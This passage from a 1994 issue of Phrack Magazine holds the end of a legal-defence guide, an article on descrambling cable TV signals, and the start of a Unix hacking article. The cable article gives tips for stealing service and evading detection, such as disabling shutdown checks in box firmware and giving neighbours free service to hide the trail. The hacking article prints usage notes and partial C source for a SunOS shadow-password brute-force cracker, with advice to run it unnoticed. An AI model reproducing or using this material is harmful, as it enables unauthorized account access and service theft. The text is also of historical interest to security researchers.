sense and a lot of caution, you should have no problem handling any
|
|||
|
legal problems that come up.
|
|||
|
|
|||
|
Note: This is intended to be used as a handbook for defense
|
|||
|
from minor crimes ONLY (hacking, DWI, etc.) If you're a career
|
|||
|
criminal, or you've murdered or raped somebody, you're scum, and at
|
|||
|
least have the grace to plead "guilty". Don't waste the tax-
|
|||
|
payers' time and money with fancy legal footwork.
|
|||
|
|
|||
|
Please feel free to add anything or correct this document.
|
|||
|
However, if you DO add or correct something, PLEASE make sure it's
|
|||
|
true, and PLEASE email me the changes so I can include them in the next
|
|||
|
revision of the document. My address is pstlb@acad3.alaska.edu. Happy
|
|||
|
hacking to all, and if this helps you avoid getting caught, so much the
|
|||
|
better. :)
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 10 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
/**************************/
|
|||
|
/* A Guide to Porno Boxes */
|
|||
|
/* by Carl Corey */
|
|||
|
/**************************/
|
|||
|
|
|||
|
|
|||
|
Keeping with tradition, and seeing that this is the first article in
|
|||
|
Phrack on cable TV descrambling, any illegal box for use in descrambling
|
|||
|
cable television signals is now known as a PORNO BOX.
|
|||
|
|
|||
|
There are many methods that cable companies use to insure that you get
|
|||
|
what you pay for - and _only_ what you pay for. Of course, there are
|
|||
|
always methods to get 'more than you pay for'. This file will discuss
|
|||
|
the most important aspects of these methods, with pointers to more
|
|||
|
detailed information, including schematics and resellers of equipment.
|
|||
|
|
|||
|
|
|||
|
Part I. How the cable company keeps you from getting signals
|
|||
|
A brief history
|
|||
|
|
|||
|
---Older Systems---
|
|||
|
|
|||
|
Most scrambling methods are, in theory, simple. The original method
|
|||
|
used to block out signals was the trap method. All traps remove signals
|
|||
|
that are sent from the CATV head end (the CATV company's station). The
|
|||
|
first method, which is rarely used anymore was the negative trap.
|
|||
|
Basically, every point where the line was dropped had these traps, which
|
|||
|
removed the pay stations from your signal. If you decided to add a pay
|
|||
|
station, the company would come out and remove the trap. This method was
|
|||
|
pretty secure - you would provide physical evidence of tampering if you
|
|||
|
climbed the pole to remove them or alter them (sticking a pin through
|
|||
|
them seemed to work randomly, but could affect other channels, as it
|
|||
|
shifts the frequency the trap removes.) This was a very secure system,
|
|||
|
but did not allow for PPV or other services, and required a lot of
|
|||
|
physical labor (pole-climbers aren't cheap). The only places this is
|
|||
|
used anymore is in an old apartment building, as one trip can service
|
|||
|
several programming changes. Look for a big gray box in the basement
|
|||
|
with a lot of coax going out. If you are going to give yourself free
|
|||
|
service, give some random others free service to hide the trail.
|
|||
|
|
|||
|
The next method used was termed a positive trap. With this method, the
|
|||
|
cable company sends a _very_ strong signal above the real signal. A
|
|||
|
tuner sees the strong signal, and locks onto the 'garbage' signal. A
|
|||
|
loud beeping and static lines would show up on the set. For the CATV
|
|||
|
company to enable a station, they put a 'positive' trap on the line,
|
|||
|
which (despite the name) removes the garbage signal. Many text files
|
|||
|
have been around on how to descramble this method (overlooking the
|
|||
|
obvious, buying a (cheap) notch filter), ranging from making a crude
|
|||
|
variable trap, to adding wires to the cable signal randomly to remove the
|
|||
|
signal. This system is hardly used anymore, as you could just put a trap
|
|||
|
inside your house, which wouldn't be noticed outside the house.
|
|||
|
|
|||
|
---Current Systems---
|
|||
|
|
|||
|
The next advent in technology was the box. The discussion of different
|
|||
|
boxes follows, but there is one rather new technology which should be
|
|||
|
discussed with the traps. The addressable trap is the CATV's dream. It
|
|||
|
combines the best features of the negative trap (very difficult to tamper
|
|||
|
with without leaving evidence) with features of addressable boxes (no
|
|||
|
lineman needs to go out to add a service, computers can process Pay Per
|
|||
|
View or other services). Basically, a 'smart trap' sits on the pole and
|
|||
|
removes signals at will. Many systems require a small amp inside the
|
|||
|
house, which the cable company uses to make sure that you don't hook up
|
|||
|
more than one TV. I believe that the new CATV act makes this illegal,
|
|||
|
and that a customer does not have to pay for any extra sets (which do not
|
|||
|
need equipment) in the house. Of course, we all know that the cable TV
|
|||
|
company will do whatever it wants until it is threatened with lawsuits.
|
|||
|
|
|||
|
Cable boxes use many different methods of descrambling. Most are not in
|
|||
|
use anymore, with a few still around, and a few around the corner in the
|
|||
|
future. The big thing to remember is sync suppression. This method is
|
|||
|
how the cable companies make the picture look like a really fucked up,
|
|||
|
waving Dali painting. Presently the most popular method is the Tri-mode
|
|||
|
In-band Sync suppression. The sync signal is suppressed by 0, 6, or 10
|
|||
|
dB. The sync can be changed randomly once per field, and the information
|
|||
|
necessary for the box to rebuild a sync signal. This very common system
|
|||
|
is discussed in Radio-Electronics magazine in the 2/87 issue. There are
|
|||
|
schematics and much more detailed theory than is provided here.
|
|||
|
|
|||
|
The other common method currently used is SSAVI, which is most common on
|
|||
|
Zenith boxes. It stands for Sync Suppression And Video Inversion. In
|
|||
|
addition to sync suppression, it uses video inversion to also 'scramble'
|
|||
|
the video. There is no sync signal transmitted separately (or reference
|
|||
|
signal to tell the box how to de-scramble) as the first 26 lines (blank,
|
|||
|
above the picture) are not de-synched, and can be re-synched with a
|
|||
|
phased lock loop - giving sync to the whole field. The data on inversion
|
|||
|
is sent somewhere in the 20 or 21st line, which is outside of the
|
|||
|
screen. Audio can be scrambled too, but it is actually just moved to a
|
|||
|
different frequency. Radio Electronics August 92 on has circuits and
|
|||
|
other info in the Drawing Board column.
|
|||
|
|
|||
|
---Future Systems-
|
|||
|
|
|||
|
For Pioneer, the future is now. The system the new Pioneers use is
|
|||
|
patented and Pioneer doesn't want you to know how it works. From the
|
|||
|
patent, it appears to use combinations of in-band, out-band, and keys
|
|||
|
(also sending false keys) to scramble and relay info necessary to
|
|||
|
descramble. These boxes are damn slick. The relevant patents are US
|
|||
|
#5,113,411 and US #4,149,158 if you care to look. There is not much
|
|||
|
information to be gained from them. Look for future updates to this
|
|||
|
article with info on the system if I can find any :)
|
|||
|
|
|||
|
Other systems are the VideoCipher + (used on satellites now - this is
|
|||
|
scary shit.) It uses DES-encrypted audio. DigiCable and DigiCipher are
|
|||
|
similar, with Digi encrypting the video with DES also (yikes)... And
|
|||
|
they all use changing keys and other methods. Oak Sigma converters use
|
|||
|
similar methods which are available now on cable. (digital encryption of
|
|||
|
audio, etc...)
|
|||
|
|
|||
|
Part II. How the cable company catches you getting those signals
|
|||
|
|
|||
|
There are many methods the CATV company can use to catch you, or at
|
|||
|
least keep you from using certain methods.
|
|||
|
|
|||
|
Market Code: Almost _all_ addressable decoders now use a market code.
|
|||
|
This is part of the serial number (which is used for pay
|
|||
|
per view addressing) which decodes to a general geographic
|
|||
|
region. Most boxes contain code which tell it to shut
|
|||
|
down if it receives a code (which can be going to any box
|
|||
|
on the cable system) which is from a different market area.
|
|||
|
So if you buy a converter that is say, market-coded for
|
|||
|
Los Angeles, you won't be able to use it in New York.
|
|||
|
|
|||
|
Bullets: The bullet is a shut down code like above - it will make
|
|||
|
your box say 'bAh' and die. The method used most is for
|
|||
|
the head end to send messages to every box they know of
|
|||
|
saying 'ignore the next shutdown message' ... and once
|
|||
|
every (legit) box has this info, it sends the bullet.
|
|||
|
The only boxes that actually process the bullet are ones
|
|||
|
which the CATV system doesn't know about. P.S. Don't
|
|||
|
call the cable company and complain about cable if you
|
|||
|
are using an illegal converter - and be sure to warn
|
|||
|
anyone you live with about calling the CATV co. also.
|
|||
|
|
|||
|
Leak Detection: The FCC forces all cable companies to drive around and
|
|||
|
look for leaks - any poor splice jobs (wiring your house
|
|||
|
from a neighbors without sealing it up nice) and some
|
|||
|
descramblers will emit RF. So while the CATV is looking
|
|||
|
for the leaks, they may catch you.
|
|||
|
|
|||
|
Free T-Shirts: The cable company can, with most boxes, tell the box to
|
|||
|
display a different signal. So they can tell every box
|
|||
|
they know of (the legit box pool) to display a commercial
|
|||
|
on another channel, while the pirate boxes get this real
|
|||
|
cool ad with an 1800 number for free t-shirts... you call,
|
|||
|
you get busted. This is mostly done during PPV boxing or
|
|||
|
other events which are paid for - as the company knows
|
|||
|
exactly who should get that signal, and can catch even
|
|||
|
legit boxes which are modified to receive the fight.
|
|||
|
|
|||
|
Your Pals: Programs like "Turn in a cable pirate and get $100" let
|
|||
|
you know who your friends _really_ are.
|
|||
|
|
|||
|
|
|||
|
Part III: How to get away with it.
|
|||
|
|
|||
|
I get a lot of questions about opening a box that you own. This is not
|
|||
|
a good idea. Most, if not ALL boxes today have a tamper sensor. If you
|
|||
|
open the box, you break a tab, flip a switch, etc... This disables the
|
|||
|
box and leaves a nice piece of evidence for the CATV co. to show that you
|
|||
|
played with it.
|
|||
|
|
|||
|
I also have had questions about the old "unplug the box when it is
|
|||
|
enabled, then plug it back in later"... The CATV company periodically
|
|||
|
sends a signal to update all the boxes to where they should be. If you
|
|||
|
want to do this, you'll need to find out where the CATV sends the address
|
|||
|
information, and then you need to trap it out of the signal. So as soon
|
|||
|
as the fraudulent customer (let's call him Chris) sees his box get the
|
|||
|
signal to receive the PPV porn channel, he installs the trap and now his
|
|||
|
box will never get any pay per view signals again... but he'll always
|
|||
|
have whatever he was viewing at the time he put the trap in. Big problem
|
|||
|
here is that most _newer_ systems also tell the box how long it can
|
|||
|
descramble that channel - i.e. "Watch SPICE until I tell you not to, or 3
|
|||
|
hours have passed"...
|
|||
|
|
|||
|
Where to make/buy/get porno boxes:
|
|||
|
|
|||
|
You can order a box which has been modified not to accept bullets. This
|
|||
|
method is pretty expensive. You can also get a 'pan' descrambler - it is
|
|||
|
a separate piece that takes whatever goes in on channel 3 (or 2 or 4) and
|
|||
|
descrambles it. These boxes can't be killed by the bullets, and work
|
|||
|
pretty well. There are some pans which are made by the same company as
|
|||
|
your cable box and are sensitive to bullets, so beware.
|
|||
|
|
|||
|
There are two basic ideas for modifying a box (provided you get detailed
|
|||
|
instructions on how to get it open, or how to fix it once you open it).
|
|||
|
You can change the S/N to something which is known as 'universal' or
|
|||
|
disassemble the code and remove the jump to the shutdown code.
|
|||
|
The universal codes are rare, and may be extinct. Besides, if the cable
|
|||
|
company finds out your code, they can nuke it. This happens when someone
|
|||
|
who makes (err made) 'universal' chips gets busted. The modification of
|
|||
|
the actual code is the best way to do it, just forcing a positive
|
|||
|
response to permission checks is the easiest way.
|
|||
|
|
|||
|
A 'cube' is not a NeXT, it's a device which removes the data signal from
|
|||
|
the cable line, and inserts a 'nice' data signal which tells your box to
|
|||
|
turn everything on. A 'destructive' cube actually re-programs all the
|
|||
|
boxes below it to a new serial number and gives that number full
|
|||
|
privileges, while a 'non-destructive' cube needs to know your boxes
|
|||
|
serial number, so it can tell your box (without modifications) that it
|
|||
|
can view everything. You have to get a new IC if you change boxes, but
|
|||
|
the plus is that you can remove the cube and the box functions as
|
|||
|
normal. Then again, you have to trust the place you are ordering the
|
|||
|
cube from to not be working for the cable company, as you have to give
|
|||
|
them your box serial number - which the CATV cable has in their records.
|
|||
|
Cubes have been seen for sale in the back of Electronics Now (formerly
|
|||
|
Radio Electronics).
|
|||
|
|
|||
|
Of course, you could check in the above mentioned articles and build
|
|||
|
circuitry, it would be a lot cheaper. The only problem is that you have
|
|||
|
to be good enough not to fuck it up - TV signals are very easy to fuck up.
|
|||
|
|
|||
|
Then there is the HOLY GRAIL. Most scrambling systems mess with the sync
|
|||
|
pulse. This pulse is followed by the colorburst signal on NTSC video.
|
|||
|
Basically, the grail finds the colorburst and uses it as a reference
|
|||
|
signal. In theory, it works wonderfully (but does not fix the video
|
|||
|
inversion problems found on SSAVI systems). However, with the sync pulse
|
|||
|
whacked, the colorburst method may give weak color or color shifts. The
|
|||
|
schematics are in the May 1990 Radio-Electronics. I have also received
|
|||
|
email from aa570@cleveland.Freenet.Edu about his colorburst kit, which is
|
|||
|
a modified (supposedly higher quality) version of the R-E schematics.
|
|||
|
The schematic and parts list is 5 bucks, 16 bucks for a pre-drilled and
|
|||
|
etched board. A little steep, but not too bad. E-mail the above for
|
|||
|
more information.
|
|||
|
|
|||
|
|
|||
|
Anyway, that's all for now. Remember, information (including XXX movies)
|
|||
|
wants to be free!
|
|||
|
|
|||
|
Carl Corey / dEs
|
|||
|
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 11 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
|
|||
|
***********************************
|
|||
|
* Unix Hacking Tools of the Trade *
|
|||
|
* *
|
|||
|
* By *
|
|||
|
* *
|
|||
|
* The Shining/UPi (UK Division) *
|
|||
|
***********************************
|
|||
|
|
|||
|
Disclaimer :
|
|||
|
|
|||
|
The following text is for educational purposes only and I strongly suggest
|
|||
|
that it is not used for malicious purposes....yeah right!
|
|||
|
|
|||
|
|
|||
|
Introduction :
|
|||
|
|
|||
|
Ok, I decided to release this phile to help out all you guys who wish to
|
|||
|
start hacking unix. Although these programs should compile & run
|
|||
|
on your system if you follow the instructions I have given, knowing a bit
|
|||
|
of C will come in handy if things go wrong. Other docs I suggest you read
|
|||
|
are older 'phrack' issues with shooting sharks various articles on unix,
|
|||
|
and of course, 'Unix from the ground up' by The Prophet.
|
|||
|
|
|||
|
This article includes three programs, a SUNOS Brute force Shadow password
|
|||
|
file cracker, The Ultimate Login Spoof, and a Unix Account Validator.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Shadow Crack
|
|||
|
------------
|
|||
|
|
|||
|
SUNOS Unix brute force shadow password file cracker
|
|||
|
---------------------------------------------------
|
|||
|
|
|||
|
Well, a while back, I saw an article in phrack which included a brute force
|
|||
|
password cracker for unix. This was a nice idea, except that these days
|
|||
|
more and more systems are moving towards the shadow password scheme. This,
|
|||
|
for those of you who are new to unix, involves storing the actual encrypted
|
|||
|
passwords in a different file, usually only accessible to root. A typical
|
|||
|
entry from a System V R4 password file looks like this :-
|
|||
|
|
|||
|
root:x:0:1:Sys. admin:/:/bin/sh
|
|||
|
|
|||
|
|
|||
|
with the actual encrypted password replaced by an 'x' in the /etc/passwd
|
|||
|
file. The encrypted password is stored in a file(in the case of sysV)
|
|||
|
called /etc/shadow which has roughly the following format :-
|
|||
|
|
|||
|
root:XyfgFekj95Fpq:::::
|
|||
|
|
|||
|
|
|||
|
this includes the login i.d., the encrypted password, and various other
|
|||
|
fields which hold info on password ageing etc...(no entry in the other
|
|||
|
fields indicate they are disabled).
|
|||
|
|
|||
|
Now this was fine as long as we stayed away from system V's, but now a
|
|||
|
whole load of other companies have jumped on the bandwagon from IBM (aix)
|
|||
|
to Suns SUNOS systems. The system I will be dealing with is SUNOS's
|
|||
|
shadowed system. Now, like sysV, SUNOS also have a system whereby the
|
|||
|
actual encrypted passwords are stored in a file usually called
|
|||
|
/etc/security/passwd.adjunct, and normally this is accessible only by root.
|
|||
|
This rules out the use of brute force crackers, like the one in phrack
|
|||
|
quite a while back, and also modern day programs like CRACK. A typical
|
|||
|
/etc/passwd file entry on shadowed SUNOS systems looks like this :-
|
|||
|
|
|||
|
root:##root:0:1:System Administrator:/:/bin/csh
|
|||
|
|
|||
|
with the 'shadow' password file taking roughly the same format as that of
|
|||
|
Sys V, usually with some extra fields.
|
|||
|
|
|||
|
However, we cannot use a program like CRACK, but SUNOS also supplied a
|
|||
|
function called pwdauth(), which basically takes two arguments, a login
|
|||
|
name and decrypted password, which is then encrypted and compared to the
|
|||
|
appropriate entry in the shadow file, thus if it matches, we have a valid
|
|||
|
i.d. & password, if not, we don't.
|
|||
|
|
|||
|
I therefore decided to write a program which would exploit this function,
|
|||
|
and could be used to get valid i.d's and passwords even on a shadowed
|
|||
|
system!
|
|||
|
|
|||
|
To my knowledge the use of the pwdauth() function is not logged, but I could
|
|||
|
be wrong. I have left it running for a while on the system I use and it has
|
|||
|
attracted no attention, and the administrator knows his shit. I have seen
|
|||
|
the functions getspwent() and getspwnam() in Sys V to manipulate the
|
|||
|
shadow password file, but not a function like pwdauth() that will actually
|
|||
|
validate the i.d. and password. If such a function does exist on other
|
|||
|
shadowed systems then this program could be very easily modified to work
|
|||
|
without problems.
|
|||
|
|
|||
|
The only real beef I have about this program is that because the
|
|||
|
pwdauth() function uses the standard unix crypt() function to encrypt the
|
|||
|
supplied password, it is very slow!!! Even in burst mode, a password file
|
|||
|
with 1000's of users could take a while to get through. My advice is
|
|||
|
to run it in the background and direct all its screen output to /dev/null
|
|||
|
like so :-
|
|||
|
|
|||
|
shcrack -mf -uroot -ddict1 > /dev/null &
|
|||
|
|
|||
|
Then you can log out then come back and check on it later!
|
|||
|
|
|||
|
The program works in a number of modes, all of which I will describe below,
|
|||
|
is command line driven, and can be used to crack both multiple accounts in
|
|||
|
the password file and single accounts specified. It is also NIS/NFS (Sun
|
|||
|
Yellow Pages) compatible.
|
|||
|
|
|||
|
|
|||
|
How to use it
|
|||
|
-------------
|
|||
|
|
|||
|
shcrack -m[mode] -p[password file] -u[user id] -d[dictionary file]
|
|||
|
|
|||
|
Usage :-
|
|||
|
|
|||
|
-m[mode] there are 3 modes of operation :-
|
|||
|
|
|||
|
-mb Burst mode, this scans the password file, trying the minimum number
|
|||
|
of password guessing strategies on every account.
|
|||
|
|
|||
|
-mi Mini-burst mode, this also scans the password file, and tries most
|
|||
|
password guessing strategies on every account.
|
|||
|
|
|||
|
-mf Brute-force mode, tries all password strategies, including the use
|
|||
|
of words from a dictionary, on a single account specified.
|
|||
|
|
|||
|
|
|||
|
more about these modes in a sec, the other options are :-
|
|||
|
|
|||
|
|
|||
|
-p[password file] This is the password file you wish to use, if this is
|
|||
|
left unspecified, the default is /etc/passwd.
|
|||
|
NB: The program automatically detects and uses the
|
|||
|
password file wherever it may be in NIS/NFS systems.
|
|||
|
|
|||
|
|
|||
|
-u[user id] The login i.d. of the account you wish to crack, this is used
|
|||
|
in Brute-force single user mode.
|
|||
|
|
|||
|
|
|||
|
-d[dict file] This uses the words in a dictionary file to generate
|
|||
|
possible passwords for use in single user brute force
|
|||
|
mode. If no filename is specified, the program only uses the
|
|||
|
password guessing strategies without using the dictionary.
|
|||
|
|
|||
|
|
|||
|
Modes
|
|||
|
^^^^^
|
|||
|
|
|||
|
-mb Burst mode basically gets each account from the appropriate password
|
|||
|
file and uses two methods to guess its password. Firstly, it uses the
|
|||
|
account name as a password, this name is then reversed and tried as a
|
|||
|
possible password. This may seem like a weak strategy, but remember,
|
|||
|
the users passwords are already shadowed, and therefore are deemed to
|
|||
|
be secure. This can lead to sloppy passwords being used, and I have
|
|||
|
came across many cases where the user has used his/her i.d. as a
|
|||
|
password.
|
|||
|
|
|||
|
|
|||
|
-mi Mini-burst mode uses a number of other password generating methods
|
|||
|
as well as the 2 listed in burst mode. One of the methods involves
|
|||
|
taking the login i.d. of the account being cracked, and appending the
|
|||
|
numbers 0 to 9 to the end of it to generate possible passwords. If
|
|||
|
this mode has no luck, it then uses the accounts gecos 'comment'
|
|||
|
information from the password file, splitting it into words and
|
|||
|
trying these as passwords. Each word from the comment field is also
|
|||
|
reversed and tried as a possible password.
|
|||
|
|
|||
|
|
|||
|
-mf Brute-force single user mode uses all the above techniques for password
|
|||
|
guessing as well as using a dictionary file to provide possible
|
|||
|
passwords to crack a single account specified. If no dictionary filename
|
|||
|
is given, this mode operates on the single account using the
|
|||
|
same methods as mini-burst mode, without the dictionary.
|
|||
|
|
|||
|
|
|||
|
Using shadow crack
|
|||
|
------------------
|
|||
|
|
|||
|
To get program help from the command line just type :-
|
|||
|
|
|||
|
$ shcrack <RETURN>
|
|||
|
|
|||
|
which will show you all the modes of operation.
|
|||
|
|
|||
|
If you wanted to crack just the account 'root', located in
|
|||
|
/etc/passwd(or elsewhere on NFS/NIS systems), using all methods
|
|||
|
including a dictionary file called 'dict1', you would do :-
|
|||
|
|
|||
|
$ shcrack -mf -uroot -ddict1
|
|||
|
|
|||
|
|
|||
|
to do the above without using the dictionary file, do :-
|
|||
|
|
|||
|
$ shcrack -mf -uroot
|
|||
|
|
|||
|
|
|||
|
or to do the above but in password file 'miner' do :-
|
|||
|
|
|||
|
$ shcrack -mf -pminer -uroot
|
|||
|
|
|||
|
|
|||
|
to start cracking all accounts in /etc/passwd, using minimum password
|
|||
|
strategies do :-
|
|||
|
|
|||
|
$ shcrack -mb
|
|||
|
|
|||
|
|
|||
|
to do the above but on a password file called 'miner' in your home
|
|||
|
directory do :-
|
|||
|
|
|||
|
$ shcrack -mb -pminer
|
|||
|
|
|||
|
|
|||
|
to start cracking all accounts in 'miner', using all strategies except
|
|||
|
dictionary words do :-
|
|||
|
|
|||
|
$ shcrack -mi -pminer
|
|||
|
|
|||
|
|
|||
|
ok, heres the code, ANSI C Compilers only :-
|
|||
|
|
|||
|
---cut here-------------------------------------------------------------------
|
|||
|
|
|||
|
/* Program : Shadow Crack
|
|||
|
Author : (c)1994 The Shining/UPi (UK Division)
|
|||
|
Date : Released 12/4/94
|
|||
|
Unix type : SUNOS Shadowed systems only */
|
|||
|
|
|||
|
#include <stdio.h>
|
|||
|
#include <pwd.h>
|
|||
|
#include <string.h>
|
|||
|
#include <ctype.h>
|
|||
|
#include <signal.h>
|
|||
|
|
|||
|
#define WORDSIZE 20 /* Maximum word size */
|
|||
|
#define OUTFILE "data" /* File to store cracked account info */
|
|||
|
|
|||
|
void word_strat( void ), do_dict( void );
|
|||
|
void add_nums( char * ), do_comment( char * );
|
|||
|
void try_word( char * ), reverse_word( char * );
|
|||
|
void find_mode( void ), burst_mode( void );
|
|||
|
void mini_burst( void ), brute_force( void );
|
|||
|
void user_info( void ), write_details( char * );
|
|||
|
void pwfile_name( void ), disable_interrupts( void ), cleanup();
|
|||
|
|
|||
|
|
|||
|
char *logname, *comment, *homedir, *shell, *dict, *mode,
|
|||
|
*pwfile, *pwdauth();
|
|||
|
struct passwd *getpwnam(), *pwentry;
|
|||
|
extern char *optarg;
|
|||
|
int option, uid, gid;
|
|||
|
|
|||
|
|
|||
|
int main( int argc, char **argv )
|
|||
|
{
|
|||
|
disable_interrupts();
|
|||
|
system("clear");
|
|||
|
|
|||
|
if (argc < 2) {
|
|||
|
printf("Shadow Crack - (c)1994 The Shining\n");
|
|||
|
printf("SUNOS Shadow password brute force cracker\n\n");
|
|||
|
printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]);
|
|||
|
printf("-d[dictfile]\n\n\n");
|
|||
|
printf("[b] is burst mode, scans pwfile trying minimum\n");
|
|||
|
printf(" password strategies on all i.d's\n\n");
|
|||
|
printf("[i] is mini-burst mode, scans pwfile trying both\n");
|
|||
|
printf(" userid, gecos info, and numbers to all i.d's\n\n");
|
|||
|
printf("[f] is bruteforce mode, tries all above stategies\n");
|
|||
|
printf(" as well as dictionary words\n\n");
|
|||
|
printf("[pwfile] Uses the password file [pwfile], default\n");
|
|||
|
printf(" is /etc/passwd\n\n");
|
|||
|
printf("[loginid] Account you wish to crack, used with\n");
|
|||
|
printf(" -mf bruteforce mode only\n\n");
|
|||
|
printf("[dictfile] uses dictionary file [dictfile] to\n");
|
|||
|
printf(" generate passwords when used with\n");
|
|||
|
printf(" -mf bruteforce mode only\n\n");
|
|||
|
exit(0);
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Get options from the command line and store them in different
|
|||
|
variables */
|
|||
|
|
|||
|
while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF)
|
|||
|
switch(option)
|
|||
|
{
|
|||
|
case 'm':
|
|||
|
mode = optarg;
|
|||
|
break;
|
|||
|
|
|||
|
case 'p':
|
|||
|
pwfile = optarg;
|
|||
|
break;
|
|||
|
|
|||
|
case 'u':
|
|||
|
logname = optarg;
|
|||
|
break;
|
|||
|
|
|||
|
case 'd':
|
|||
|
dict = optarg;
|
|||
|
break;
|
|||
|
|
|||
|
default:
|
|||
|
printf("wrong options\n");
|
|||
|
break;
|
|||
|
}
|
|||
|
|
|||
|
find_mode();
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Routine to redirect interrupts */
|
|||
|
|
|||
|
void disable_interrupts( void )
|
|||
|
{
|
|||
|
signal(SIGHUP, SIG_IGN);
|
|||
|
signal(SIGTSTP, cleanup);
|
|||
|
signal(SIGINT, cleanup);
|
|||
|
signal(SIGQUIT, cleanup);
|
|||
|
signal(SIGTERM, cleanup);
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* If CTRL-Z or CTRL-C is pressed, clean up & quit */
|
|||
|
|
|||
|
void cleanup( void )
|
|||
|
{
|
|||
|
FILE *fp;
|
|||
|
|
|||
|
if ((fp = fopen("gecos", "r")) != NULL)
|
|||
|
remove("gecos");
|
|||
|
|
|||
|
if ((fp = fopen("data", "r")) == NULL)
|
|||
|
printf("\nNo accounts cracked\n");
|
|||
|
|
|||
|
printf("Quitting\n");
|
|||
|
exit(0);
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Function to decide which mode is being used and call appropriate
|
|||
|
routine */
|
|||
|
|
|||
|
void find_mode( void )
|
|||
|
{
|
|||
|
if (strcmp(mode, "b") == NULL)
|
|||
|
burst_mode();
|
|||
|
else
|
|||
|
if (strcmp(mode, "i") == NULL)
|
|||
|
mini_burst();
|
|||
|
else
|
|||
|
if (strcmp(mode, "f") == NULL)
|
|||
|
brute_force();
|
|||
|
else
|
|||
|
{
|
|||
|
printf("Sorry - No such mode\n");
|
|||
|
exit(0);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Get a users information from the password file */
|
|||
|
|
|||
|
void user_info( void )
|
|||
|
{
|
|||
|
uid = pwentry->pw_uid;
|
|||
|
gid = pwentry->pw_gid;
|
|||
|
comment = pwentry->pw_gecos;
|
|||
|
homedir = pwentry->pw_dir;
|
|||
|
shell = pwentry->pw_shell;
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
|
|||
|
/* Set the filename of the password file to be used, default is
|
|||
|
/etc/passwd */
|
|||
|
|
|||
|
void pwfile_name( void )
|
|||
|
{
|
|||
|
if (pwfile != NULL)
|
|||
|
setpwfile(pwfile);
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
|
|||
|
/* Burst mode, tries user i.d. & then reverses it as possible passwords
|
|||
|
on every account found in the password file */
|
|||
|
|
|||
|
void burst_mode( void )
|
|||
|
{
|
|||
|
pwfile_name();
|
|||
|
setpwent();
|
|||
|
|
|||
|
while ((pwentry = getpwent()) != (struct passwd *) NULL)
|
|||
|
{
|
|||
|
logname = pwentry->pw_name;
|
|||
|
user_info();
|
|||
|
try_word( logname );
|
|||
|
reverse_word( logname );
|
|||
|
}
|
|||
|
|
|||
|
endpwent();
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Mini-burst mode, try above combinations as well as other strategies
|
|||
|
which include adding numbers to the end of the user i.d. to generate
|
|||
|
passwords or using the comment field information in the password
|
|||
|
file */
|
|||
|
|
|||
|
void mini_burst( void )
|
|||
|
{
|
|||
|
pwfile_name();
|
|||
|
setpwent();
|
|||
|
|
|||
|
while ((pwentry = getpwent()) != (struct passwd *) NULL)
|
|||
|
{
|
|||
|
logname = pwentry->pw_name;
|
|||
|
user_info();
|
|||
|
word_strat();
|
|||
|
}
|
|||
|
|
|||
|
endpwent();
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Brute force mode, uses all the above strategies as well using a
|
|||
|
dictionary file to generate possible passwords */
|
|||
|
|
|||
|
void brute_force( void )
|
|||
|
{
|
|||
|
pwfile_name();
|
|||
|
setpwent();
|
|||
|
|
|||
|
if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) {
|
|||
|
printf("Sorry - User unknown\n");
|
|||
|
exit(0);
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
user_info();
|
|||
|
word_strat();
|
|||
|
do_dict();
|
|||
|
}
|
|||
|
|
|||
|
endpwent();
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Calls the various password guessing strategies */
|
|||
|
|
|||
|
void word_strat()
|
|||
|
{
|
|||
|
try_word( logname );
|
|||
|
reverse_word( logname );
|
|||
|
add_nums( logname );
|
|||
|
do_comment( comment );
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Takes the user name as its argument and then generates possible
|
|||
|
passwords by adding the numbers 0-9 to the end. If the username
|
|||
|
is greater than 7 characters, don't bother */
|
|||
|
|
|||
|
void add_nums( char *wd )
|
|||
|
{
|
|||
|
int i;
|
|||
|
char temp[2], buff[WORDSIZE];
|
|||
|
|
|||
|
if (strlen(wd) < 8) {
|
|||
|
|
|||
|
for (i = 0; i < 10; i++)
|
|||
|
{
|
|||
|
strcpy(buff, wd);
|
|||
|
sprintf(temp, "%d", i);
|
|||
|
strcat(wd, temp);
|
|||
|
try_word( wd );
|
|||
|
strcpy(wd, buff);
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
|
|||
|
/* Gets info from the 'gecos' comment field in the password file,
|
|||
|
then process this information generating possible passwords from it */
|
|||
|
|
|||
|
void do_comment( char *wd )
|
|||
|
{
|
|||
|
FILE *fp;
|
|||
|
|
|||
|
char temp[2], buff[WORDSIZE];
|
|||
|
int c, flag;
|
|||
|
|
|||
|
flag = 0;
|
|||
|
|
|||
|
|
|||
|
/* Open file & store users gecos information in it. w+ mode
|
|||
|
allows us to write to it & then read from it. */
|
|||
|
|
|||
|
if ((fp = fopen("gecos", "w+")) == NULL) {
|
|||
|
printf("Error writing gecos info\n");
|
|||
|
exit(0);
|
|||
|
}
|
|||
|
|
|||
|
fprintf(fp, "%s\n", wd);
|
|||
|
rewind(fp);
|
|||
|
|
|||
|
strcpy(buff, "");
|
|||
|
|
|||
|
|
|||
|
/* Process users gecos information, separate words by checking for the
|
|||
|
',' field separater or a space. */
|
|||
|
|
|||
|
while ((c = fgetc(fp)) != EOF)
|
|||
|
{
|
|||
|
|
|||
|
if (( c != ',' ) && ( c != ' ' )) {
|
|||
